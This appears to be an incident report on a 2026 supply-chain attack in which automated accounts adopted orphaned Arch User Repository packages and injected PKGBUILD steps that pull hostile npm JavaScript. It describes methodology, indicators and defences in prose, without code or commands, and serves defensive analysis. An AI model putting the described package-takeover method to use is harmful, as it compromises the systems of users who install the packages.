Full Report
Community repo freezes new accounts after attackers swamp it with poisoned package updates
Analysis Summary
# Incident Report: Arch User Repository (AUR) Poisoning Campaign
## Executive Summary
The Arch User Repository (AUR) was targeted by a large-scale supply chain attack involving the distribution of over 1,500 poisoned packages. Attackers utilized automated account creation and package adoption to inject malicious JavaScript dependencies into community-maintained build files. To mitigate the spread, Arch Linux administrators froze new account registrations and disabled package updates while cleanup operations commenced.
## Incident Details
- **Discovery Date:** June 12, 2026
- **Incident Date:** June 12 – June 15, 2026
- **Affected Organization:** Arch Linux (Community Repository)
- **Sector:** Information Technology / Open Source Software
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** June 12, 2026
- **Vector:** Automated Account Creation / Package Adoption
- **Details:** Attackers leveraged the community-driven nature of the AUR to "adopt" orphaned packages or create new ones, uploading malicious `PKGBUILD` files.
### Lateral Movement
- **N/A:** The attack was focused on external supply chain poisoning rather than internal network lateral movement.
### Data Exfiltration/Impact
- **Impact:** Compromise of the software supply chain for users pulling from the AUR.
- **Scope:** Initially detected with 400 packages; escalated to over 1,500 malicious commits by June 14.
### Detection & Response
- **Detection (June 12):** Arch Linux team acknowledged a high volume of malicious package updates and adoptions.
- **Escalation (June 14):** A more sophisticated wave of malicious packages was identified involving host JavaScript dependencies.
- **Containment (June 15):** Administrators officially disabled new account registrations and hindered package updates/creations to facilitate cleanup.
## Attack Methodology
- **Initial Access:** Exploitation of open contribution policies; automated creation of community accounts.
- **Persistence:** Injection of malicious code into `PKGBUILD` scripts which execute during package installation/update.
- **Defense Evasion:** Use of "package adoption" (taking over neglected packages) to appear as legitimate maintenance.
- **Collection:** Hostile JavaScript dependencies pulled from npm.
- **Impact:** Software Supply Chain Poisoning; potential remote code execution on end-user systems upon package build.
## Impact Assessment
- **Financial:** Non-disclosed; involves man-hours for community cleanup.
- **Data Breach:** Risk of credential theft or system compromise for users who installed affected packages.
- **Operational:** Significant disruption to AUR availability; registration and update services suspended.
- **Reputational:** High; marks another instance of AUR vulnerability following similar incidents in 2025.
## Indicators of Compromise
- **Network:** Requests to suspicious npm registry endpoints (URLs not explicitly listed but denoted as "hostile JavaScript dependencies").
- **File:** Malicious `PKGBUILD` scripts containing commands to fetch external JS payloads.
- **Behavioral:** Rapid adoption of multiple orphaned packages by newly created or previously inactive accounts.
## Response Actions
- **Containment:** Disabled new account registrations on the AUR.
- **Containment:** Restricted the ability to adopt or create new packages.
- **Eradication:** Manual and automated identification/removal of over 1,500 compromised packages.
- **Recovery:** Ongoing cleanup of the repository and notification of the community via mailing lists.
## Lessons Learned
- **Key Takeaways:** Community-run repositories without strict vetting are highly susceptible to automated "carpet bombing" attacks.
- **Vulnerabilities:** The "unsupported" nature of the AUR places the entire security burden on the end-user, which fails when attacks reach this scale.
- **Improvements:** The delay between the initial discovery (June 12) and freezing registrations (June 15) allowed the compromise to grow from 400 to 1,500 packages.
## Recommendations
- **Identity Verification:** Implement stricter hurdles for new account creation (e.g., CAPTCHAs, manual approval, or proof of work).
- **Rate Limiting:** Restrict the number of packages a new account can adopt or update within a specific timeframe.
- **Automated Scanning:** Integrate automated linting and security scanning for `PKGBUILD` submissions to flag external or suspicious dependency calls.
- **User Education:** Reiterate the necessity for users to inspect files (e.g., `makepkg` subversion checks) before execution.